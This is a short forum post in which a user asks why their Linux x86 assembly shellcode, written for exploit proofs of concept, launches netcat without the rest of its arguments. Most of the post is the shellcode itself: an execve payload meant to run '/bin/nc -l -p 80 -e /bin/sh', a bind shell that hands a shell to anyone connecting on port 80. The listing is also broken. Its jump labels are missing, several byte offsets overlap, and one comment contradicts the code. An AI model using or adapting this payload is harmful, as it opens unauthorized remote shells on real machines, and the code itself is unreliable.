Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


Linux Intel Assembly for shellcode

I am trying to learn how to write shellcode for my proof of concepts for exploits I find but I am not very good at assembly.
This is the code I was working on and for some reason it assembles fine but I think somewhere I might have made a mistake in some calculation for something? It basically launches Netcat like I asked it to but doesnt run the rest of the netcat command...

Section .text
global _start

jmp short b


pop esi
xor eax, eax
mov byte [esi + 7], al ; terminate /bin/nc
mov byte [esi + 10], al ; terminate -l
mov byte [esi + 13], al ; terminate -p
mov byte [esi + 17], al ; terminate 80
mov byte [esi + 20], al ; terminate -e
mov byte [esi + 27], al ; terminate /bin/sh
mov long [esi + 29], esi ; address of /bin/nc in AAAA
lea ebx, [esi + 8] ; get address of -l
mov long [esi + 33], ebx ; store address of -l in BBBB
lea ebx, [esi + 11] ; get address of -p
mov long [esi + 37], ebx ; store address of -p in CCCC
lea ebx, [esi + 14] ; get address of 80
mov long [esi + 41], ebx ; store address of 80 in DDDD
lea ebx, [esi + 17] ; get address of -e
mov long [esi + 45], ebx ; store address of -e in EEEE
lea ebx, [esi + 20] ; get address of /bin/sh
mov long [esi + 49], ebx ; Store address of /bin/sh in FFFF
mov long [esi + 53], eax ; put NULL in GGGG
mov byte al, 0x0b ; use execve
mov ebx, esi ; program
lea ecx, [esi + 29] ; argument array (/bin/sh -c /bin/ls)
lea edx, [esi + 53] ; NULL
int 0x80 ; call the kernel

call a
db '/bin/nc#-l#-p#80#-e#/bin/sh#AAAABBBBCCCCDDDDEEEEFFFFFGGGG'
Sign In or Register to comment.